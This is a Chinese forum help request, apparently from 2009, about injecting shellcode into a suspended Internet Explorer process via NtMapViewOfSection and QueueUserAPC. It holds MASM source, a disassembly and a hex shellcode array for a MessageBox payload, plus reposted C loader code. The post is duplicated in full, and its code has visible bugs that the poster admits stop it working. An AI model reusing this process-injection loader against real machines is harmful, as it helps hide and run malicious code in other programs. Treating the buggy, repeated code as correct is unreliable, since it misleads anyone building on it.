-
-
[旧帖] [求助]一个利用alertable I/o 和 mapping来完成远程注入,shellcode是不是这样写 0.00雪花
-
发表于: 2009-2-19 21:08 2807
-
[旧帖] [求助]一个利用alertable I/o 和 mapping来完成远程注入,shellcode是不是这样写 0.00雪花
2009-2-19 21:08
2807
看到一个利用alertable I/o 和 mapping来完成远程注入的一个文章,自己动手弄了弄,搞不定阿,才学汇编一个月不到,望牛牛们指点一二阿
我按照QueueUserAPC 第一个参数要求的函数形式写成了一个子程序
(很简单只是调出一个messagebox):
.386
.model flat,stdcall
option casemap:none
include windows.inc
include kernel32.inc
include user32.inc
includelib kernel32.lib
includelib user32.lib
.code
start:
Queue proc uses ebx edi esi _lParam1,_lParam2,_lParam3
local @szFuncName[32]:byte
local @szDll[32]:byte
local @hModule
local @MessageBox
lea esi,@szFuncName
mov al,'M'
stosb
mov al,'e'
stosb
mov al,'s'
stosb
mov al,'s'
stosb
mov al,'a'
stosb
mov al,'g'
stosb
mov al,'e'
stosb
mov al,'B'
stosb
mov al,'o'
stosb
mov al,'x'
stosb
mov al,'A'
stosb
mov al,0
stosb
mov al,'u'
stosb
mov al,'s'
stosb
mov al,'e'
stosb
mov al,'r'
stosb
mov al,'3'
stosb
mov al,'2'
stosb
mov al,'.'
stosb
mov al,'d'
stosb
mov al,'l'
stosb
mov al,'l'
stosb
mov al,0
stosb
lea eax,@szDll
push eax
call GetModuleHandle
mov @hModule,eax
lea eax,@szFuncName
push eax
push @hModule
call GetProcAddress
mov @MessageBox,eax
push NULL
push NULL
push NULL
push NULL
call @MessageBox
ret
Queue endp
end start
并用od将GetModule GetProcAddress换成它们的入口地址(假设每个程序user32.dll kernel32.dll有相同的地址,俄!),拷出此子程序的十六进制代码
00401000 >/$ 55 push ebp
00401001 |. 8BEC mov ebp, esp
00401003 |. 83C4 B8 add esp, -48
00401006 |. 53 push ebx
00401007 |. 57 push edi
00401008 |. 56 push esi
00401009 |. 8D75 E0 lea esi, dword ptr [ebp-20]
0040100C |. B0 4D mov al, 4D
0040100E |. AA stos byte ptr es:[edi]
0040100F |. B0 65 mov al, 65
00401011 |. AA stos byte ptr es:[edi]
00401012 |. B0 73 mov al, 73
00401014 |. AA stos byte ptr es:[edi]
00401015 |. B0 73 mov al, 73
00401017 |. AA stos byte ptr es:[edi]
00401018 |. B0 61 mov al, 61
0040101A |. AA stos byte ptr es:[edi]
0040101B |. B0 67 mov al, 67
0040101D |. AA stos byte ptr es:[edi]
0040101E |. B0 65 mov al, 65
00401020 |. AA stos byte ptr es:[edi]
00401021 |. B0 42 mov al, 42
00401023 |. AA stos byte ptr es:[edi]
00401024 |. B0 6F mov al, 6F
00401026 |. AA stos byte ptr es:[edi]
00401027 |. B0 78 mov al, 78
00401029 |. AA stos byte ptr es:[edi]
0040102A |. B0 41 mov al, 41
0040102C |. AA stos byte ptr es:[edi]
0040102D |. B0 00 mov al, 0
0040102F |. AA stos byte ptr es:[edi]
00401030 |. B0 75 mov al, 75
00401032 |. AA stos byte ptr es:[edi]
00401033 |. B0 73 mov al, 73
00401035 |. AA stos byte ptr es:[edi]
00401036 |. B0 65 mov al, 65
00401038 |. AA stos byte ptr es:[edi]
00401039 |. B0 72 mov al, 72
0040103B |. AA stos byte ptr es:[edi]
0040103C |. B0 33 mov al, 33
0040103E |. AA stos byte ptr es:[edi]
0040103F |. B0 32 mov al, 32
00401041 |. AA stos byte ptr es:[edi]
00401042 |. B0 2E mov al, 2E
00401044 |. AA stos byte ptr es:[edi]
00401045 |. B0 64 mov al, 64
00401047 |. AA stos byte ptr es:[edi]
00401048 |. B0 6C mov al, 6C
0040104A |. AA stos byte ptr es:[edi]
0040104B |. B0 6C mov al, 6C
0040104D |. AA stos byte ptr es:[edi]
0040104E |. B0 00 mov al, 0
00401050 |. AA stos byte ptr es:[edi]
00401051 |. 8D45 C0 lea eax, dword ptr [ebp-40]
00401054 |. 50 push eax ; /pModule
00401055 E8 D7A6407C call 7c80b731
0040105A |. 8945 BC mov dword ptr [ebp-44], eax
0040105D |. 8D45 E0 lea eax, dword ptr [ebp-20]
00401060 |. 50 push eax ; /ProcNameOrOrdinal
00401061 |. FF75 BC push dword ptr [ebp-44] ; |hModule
00401064 E8 C79D407C call 7c80ae30
00401069 |. 8945 B8 mov dword ptr [ebp-48], eax
0040106C |. 6A 00 push 0
0040106E |. 6A 00 push 0
00401070 |. 6A 00 push 0
00401072 |. 6A 00 push 0
00401074 |. FF55 B8 call dword ptr [ebp-48]
00401077 |. 5E pop esi
00401078 |. 5F pop edi
00401079 |. 5B pop ebx
0040107A |. C9 leave
0040107B \. C2 0C00 retn 0C
十六制的代码:
byte shellcode[]={0x55,0x8B,0xEC,0x83,0xC4,0xB8,0x53,0x57,0x56,0x8D,0x75,
0xE0,0xB0,0x4D,0xAA,0xB0,0x65,0xAA,0xB0,0x73,0xAA,
0xB0,0x73,0xAA,0xB0,0x61,0xAA,0xB0,0x67,0xAA,0xB0,
0x65,0xAA,0xB0,0x42,0xAA,0xB0,0x6F,0xAA,0xB0,0x78,
0xAA,0xB0,0x41,0xAA,0xB0,0x00,0xAA,0xB0,0x75,0xAA,
0xB0,0x73,0xAA,0xB0,0x65,0xAA,0xB0,0x72,0xAA,0xB0,
0x33,0xAA,0xB0,0x32,0xAA,0xB0,0x2E,0xAA,0xB0,0x64,
0xAA,0xB0,0x6C,0xAA,0xB0,0x6C,0xAA,0xB0,0x00,0xAA,
0x8D,0x45,0xC0,0x50,0xE8,0xD7,0xA6,0x40,0x7C,0x89,
0x45,0xBC,0x8D,0x45,0xE0,0x50,0xFF,0x75,0xBC,0xE8,
0xC7,0x9D,0x40,0x7C,0x89,0x45,0xB8,0x6A,0x00,0x6A,
0x00,0x6A,0x00,0x6A,0x00,0xFF,0x55,0xB8,0x5E,0x5F,
0x5B,0xC9,0xC2,0x0C,0x00};
用writefile函数写入shellcode.txt,是不是这样就可以远程运行那个小子程序了????
试了不行,哈哈,太笨了,肯定哪里功夫不到家,望牛牛指点指点拉~~
[转]我研究出了一种新的在远程进程中执行代码的可能性,就是利用一个未文档函数在远程进程地址空间写入代码,并且用一种新的技术在远程进程中执行它,这种技术完全工作在用户模式下,并且不需要特殊的条件比如像管理员权限或者之类的要求。让源码说明一切:(我为我的英文水平感到抱歉,我来自德国)
代码:
#define _WIN32_WINNT 0x0400
#include <windows.h>
typedef LONG NTSTATUS, *PNTSTATUS;
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
typedef enum _SECTION_INHERIT
{
ViewShare = 1,
ViewUnmap = 2
} SECTION_INHERIT;
typedef NTSTATUS (__stdcall *func_NtMapViewOfSection) ( HANDLE, HANDLE, LPVOID, ULONG, SIZE_T, LARGE_INTEGER*, SIZE_T*, SECTION_INHERIT, ULONG, ULONG );
func_NtMapViewOfSection NtMapViewOfSection = NULL;
LPVOID NTAPI MyMapViewOfFileEx( HANDLE hProcess, HANDLE hFileMappingObject, DWORD dwDesiredAccess, DWORD dwFileOffsetHigh, DWORD dwFileOffsetLow,
DWORD dwNumberOfBytesToMap, LPVOID lpBaseAddress )
{
NTSTATUS Status;
LARGE_INTEGER SectionOffset;
ULONG ViewSize;
ULONG Protect;
LPVOID ViewBase;
// 转换偏移量
SectionOffset.LowPart = dwFileOffsetLow;
SectionOffset.HighPart = dwFileOffsetHigh;
// 保存大小和起始地址
ViewBase = lpBaseAddress;
ViewSize = dwNumberOfBytesToMap;
// 转换标志为NT保护属性
if (dwDesiredAccess & FILE_MAP_WRITE)
{
Protect = PAGE_READWRITE;
}
else if (dwDesiredAccess & FILE_MAP_READ)
{
Protect = PAGE_READONLY;
}
else if (dwDesiredAccess & FILE_MAP_COPY)
{
Protect = PAGE_WRITECOPY;
}
else
{
Protect = PAGE_NOACCESS;
}
//映射区段
Status = NtMapViewOfSection(hFileMappingObject,
hProcess,
&ViewBase,
0,
0,
&SectionOffset,
&ViewSize,
ViewShare,
0,
Protect);
if (!NT_SUCCESS(Status))
{
// 失败
return NULL;
}
//返回起始地址
return ViewBase;
}
int WINAPI WinMain (HINSTANCE, HINSTANCE, LPSTR, int)
{
DWORD dwNum;
HMODULE hDll = LoadLibrary( "ntdll.dll" );
NtMapViewOfSection = (func_NtMapViewOfSection) GetProcAddress (hDll, "NtMapViewOfSection");
// 取ShellCode,任何你想实现的
HANDLE hFile = CreateFile ("C:\\shellcode.txt", GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
WriteFile (hFile,shellcode,sizeof (shellcode),&dwNum,NULL);
HANDLE hMappedFile = CreateFileMapping (hFile, NULL, PAGE_READONLY, 0, 0, NULL);
// 启动目标进程
STARTUPINFO st;
ZeroMemory (&st, sizeof(st));
st.cb = sizeof (STARTUPINFO);
PROCESS_INFORMATION pi;
ZeroMemory (&pi, sizeof(pi));
CreateProcess ("C:\\Programme\\Internet Explorer\\iexplore.exe", NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &st, &pi);
// 注入shellcode到目标进程地址空间
LPVOID MappedFile = MyMapViewOfFileEx (pi.hProcess, hMappedFile, FILE_MAP_READ, 0, 0, 0, NULL);
// 创建一个新的能够在目标线程恢复是首先执行的APC
QueueUserAPC ((PAPCFUNC) MappedFile, pi.hThread, NULL);
ResumeThread (pi.hThread);
CloseHandle (hFile);
CloseHandle (hMappedFile);
CloseHandle (pi.hThread);
CloseHandle (pi.hProcess);
return 0;
}
我按照QueueUserAPC 第一个参数要求的函数形式写成了一个子程序
(很简单只是调出一个messagebox):
.386
.model flat,stdcall
option casemap:none
include windows.inc
include kernel32.inc
include user32.inc
includelib kernel32.lib
includelib user32.lib
.code
start:
Queue proc uses ebx edi esi _lParam1,_lParam2,_lParam3
local @szFuncName[32]:byte
local @szDll[32]:byte
local @hModule
local @MessageBox
lea esi,@szFuncName
mov al,'M'
stosb
mov al,'e'
stosb
mov al,'s'
stosb
mov al,'s'
stosb
mov al,'a'
stosb
mov al,'g'
stosb
mov al,'e'
stosb
mov al,'B'
stosb
mov al,'o'
stosb
mov al,'x'
stosb
mov al,'A'
stosb
mov al,0
stosb
mov al,'u'
stosb
mov al,'s'
stosb
mov al,'e'
stosb
mov al,'r'
stosb
mov al,'3'
stosb
mov al,'2'
stosb
mov al,'.'
stosb
mov al,'d'
stosb
mov al,'l'
stosb
mov al,'l'
stosb
mov al,0
stosb
lea eax,@szDll
push eax
call GetModuleHandle
mov @hModule,eax
lea eax,@szFuncName
push eax
push @hModule
call GetProcAddress
mov @MessageBox,eax
push NULL
push NULL
push NULL
push NULL
call @MessageBox
ret
Queue endp
end start
并用od将GetModule GetProcAddress换成它们的入口地址(假设每个程序user32.dll kernel32.dll有相同的地址,俄!),拷出此子程序的十六进制代码
00401000 >/$ 55 push ebp
00401001 |. 8BEC mov ebp, esp
00401003 |. 83C4 B8 add esp, -48
00401006 |. 53 push ebx
00401007 |. 57 push edi
00401008 |. 56 push esi
00401009 |. 8D75 E0 lea esi, dword ptr [ebp-20]
0040100C |. B0 4D mov al, 4D
0040100E |. AA stos byte ptr es:[edi]
0040100F |. B0 65 mov al, 65
00401011 |. AA stos byte ptr es:[edi]
00401012 |. B0 73 mov al, 73
00401014 |. AA stos byte ptr es:[edi]
00401015 |. B0 73 mov al, 73
00401017 |. AA stos byte ptr es:[edi]
00401018 |. B0 61 mov al, 61
0040101A |. AA stos byte ptr es:[edi]
0040101B |. B0 67 mov al, 67
0040101D |. AA stos byte ptr es:[edi]
0040101E |. B0 65 mov al, 65
00401020 |. AA stos byte ptr es:[edi]
00401021 |. B0 42 mov al, 42
00401023 |. AA stos byte ptr es:[edi]
00401024 |. B0 6F mov al, 6F
00401026 |. AA stos byte ptr es:[edi]
00401027 |. B0 78 mov al, 78
00401029 |. AA stos byte ptr es:[edi]
0040102A |. B0 41 mov al, 41
0040102C |. AA stos byte ptr es:[edi]
0040102D |. B0 00 mov al, 0
0040102F |. AA stos byte ptr es:[edi]
00401030 |. B0 75 mov al, 75
00401032 |. AA stos byte ptr es:[edi]
00401033 |. B0 73 mov al, 73
00401035 |. AA stos byte ptr es:[edi]
00401036 |. B0 65 mov al, 65
00401038 |. AA stos byte ptr es:[edi]
00401039 |. B0 72 mov al, 72
0040103B |. AA stos byte ptr es:[edi]
0040103C |. B0 33 mov al, 33
0040103E |. AA stos byte ptr es:[edi]
0040103F |. B0 32 mov al, 32
00401041 |. AA stos byte ptr es:[edi]
00401042 |. B0 2E mov al, 2E
00401044 |. AA stos byte ptr es:[edi]
00401045 |. B0 64 mov al, 64
00401047 |. AA stos byte ptr es:[edi]
00401048 |. B0 6C mov al, 6C
0040104A |. AA stos byte ptr es:[edi]
0040104B |. B0 6C mov al, 6C
0040104D |. AA stos byte ptr es:[edi]
0040104E |. B0 00 mov al, 0
00401050 |. AA stos byte ptr es:[edi]
00401051 |. 8D45 C0 lea eax, dword ptr [ebp-40]
00401054 |. 50 push eax ; /pModule
00401055 E8 D7A6407C call 7c80b731
0040105A |. 8945 BC mov dword ptr [ebp-44], eax
0040105D |. 8D45 E0 lea eax, dword ptr [ebp-20]
00401060 |. 50 push eax ; /ProcNameOrOrdinal
00401061 |. FF75 BC push dword ptr [ebp-44] ; |hModule
00401064 E8 C79D407C call 7c80ae30
00401069 |. 8945 B8 mov dword ptr [ebp-48], eax
0040106C |. 6A 00 push 0
0040106E |. 6A 00 push 0
00401070 |. 6A 00 push 0
00401072 |. 6A 00 push 0
00401074 |. FF55 B8 call dword ptr [ebp-48]
00401077 |. 5E pop esi
00401078 |. 5F pop edi
00401079 |. 5B pop ebx
0040107A |. C9 leave
0040107B \. C2 0C00 retn 0C
十六制的代码:
byte shellcode[]={0x55,0x8B,0xEC,0x83,0xC4,0xB8,0x53,0x57,0x56,0x8D,0x75,
0xE0,0xB0,0x4D,0xAA,0xB0,0x65,0xAA,0xB0,0x73,0xAA,
0xB0,0x73,0xAA,0xB0,0x61,0xAA,0xB0,0x67,0xAA,0xB0,
0x65,0xAA,0xB0,0x42,0xAA,0xB0,0x6F,0xAA,0xB0,0x78,
0xAA,0xB0,0x41,0xAA,0xB0,0x00,0xAA,0xB0,0x75,0xAA,
0xB0,0x73,0xAA,0xB0,0x65,0xAA,0xB0,0x72,0xAA,0xB0,
0x33,0xAA,0xB0,0x32,0xAA,0xB0,0x2E,0xAA,0xB0,0x64,
0xAA,0xB0,0x6C,0xAA,0xB0,0x6C,0xAA,0xB0,0x00,0xAA,
0x8D,0x45,0xC0,0x50,0xE8,0xD7,0xA6,0x40,0x7C,0x89,
0x45,0xBC,0x8D,0x45,0xE0,0x50,0xFF,0x75,0xBC,0xE8,
0xC7,0x9D,0x40,0x7C,0x89,0x45,0xB8,0x6A,0x00,0x6A,
0x00,0x6A,0x00,0x6A,0x00,0xFF,0x55,0xB8,0x5E,0x5F,
0x5B,0xC9,0xC2,0x0C,0x00};
用writefile函数写入shellcode.txt,是不是这样就可以远程运行那个小子程序了????
试了不行,哈哈,太笨了,肯定哪里功夫不到家,望牛牛指点指点拉~~
[转]我研究出了一种新的在远程进程中执行代码的可能性,就是利用一个未文档函数在远程进程地址空间写入代码,并且用一种新的技术在远程进程中执行它,这种技术完全工作在用户模式下,并且不需要特殊的条件比如像管理员权限或者之类的要求。让源码说明一切:(我为我的英文水平感到抱歉,我来自德国)
代码:
#define _WIN32_WINNT 0x0400
#include <windows.h>
typedef LONG NTSTATUS, *PNTSTATUS;
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
typedef enum _SECTION_INHERIT
{
ViewShare = 1,
ViewUnmap = 2
} SECTION_INHERIT;
typedef NTSTATUS (__stdcall *func_NtMapViewOfSection) ( HANDLE, HANDLE, LPVOID, ULONG, SIZE_T, LARGE_INTEGER*, SIZE_T*, SECTION_INHERIT, ULONG, ULONG );
func_NtMapViewOfSection NtMapViewOfSection = NULL;
LPVOID NTAPI MyMapViewOfFileEx( HANDLE hProcess, HANDLE hFileMappingObject, DWORD dwDesiredAccess, DWORD dwFileOffsetHigh, DWORD dwFileOffsetLow,
DWORD dwNumberOfBytesToMap, LPVOID lpBaseAddress )
{
NTSTATUS Status;
LARGE_INTEGER SectionOffset;
ULONG ViewSize;
ULONG Protect;
LPVOID ViewBase;
// 转换偏移量
SectionOffset.LowPart = dwFileOffsetLow;
SectionOffset.HighPart = dwFileOffsetHigh;
// 保存大小和起始地址
ViewBase = lpBaseAddress;
ViewSize = dwNumberOfBytesToMap;
// 转换标志为NT保护属性
if (dwDesiredAccess & FILE_MAP_WRITE)
{
Protect = PAGE_READWRITE;
}
else if (dwDesiredAccess & FILE_MAP_READ)
{
Protect = PAGE_READONLY;
}
else if (dwDesiredAccess & FILE_MAP_COPY)
{
Protect = PAGE_WRITECOPY;
}
else
{
Protect = PAGE_NOACCESS;
}
//映射区段
Status = NtMapViewOfSection(hFileMappingObject,
hProcess,
&ViewBase,
0,
0,
&SectionOffset,
&ViewSize,
ViewShare,
0,
Protect);
if (!NT_SUCCESS(Status))
{
// 失败
return NULL;
}
//返回起始地址
return ViewBase;
}
int WINAPI WinMain (HINSTANCE, HINSTANCE, LPSTR, int)
{
DWORD dwNum;
HMODULE hDll = LoadLibrary( "ntdll.dll" );
NtMapViewOfSection = (func_NtMapViewOfSection) GetProcAddress (hDll, "NtMapViewOfSection");
// 取ShellCode,任何你想实现的
HANDLE hFile = CreateFile ("C:\\shellcode.txt", GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
WriteFile (hFile,shellcode,sizeof (shellcode),&dwNum,NULL);
HANDLE hMappedFile = CreateFileMapping (hFile, NULL, PAGE_READONLY, 0, 0, NULL);
// 启动目标进程
STARTUPINFO st;
ZeroMemory (&st, sizeof(st));
st.cb = sizeof (STARTUPINFO);
PROCESS_INFORMATION pi;
ZeroMemory (&pi, sizeof(pi));
CreateProcess ("C:\\Programme\\Internet Explorer\\iexplore.exe", NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &st, &pi);
// 注入shellcode到目标进程地址空间
LPVOID MappedFile = MyMapViewOfFileEx (pi.hProcess, hMappedFile, FILE_MAP_READ, 0, 0, 0, NULL);
// 创建一个新的能够在目标线程恢复是首先执行的APC
QueueUserAPC ((PAPCFUNC) MappedFile, pi.hThread, NULL);
ResumeThread (pi.hThread);
CloseHandle (hFile);
CloseHandle (hMappedFile);
CloseHandle (pi.hThread);
CloseHandle (pi.hProcess);
return 0;
}
赞赏
看原图
赞赏
雪币:
留言: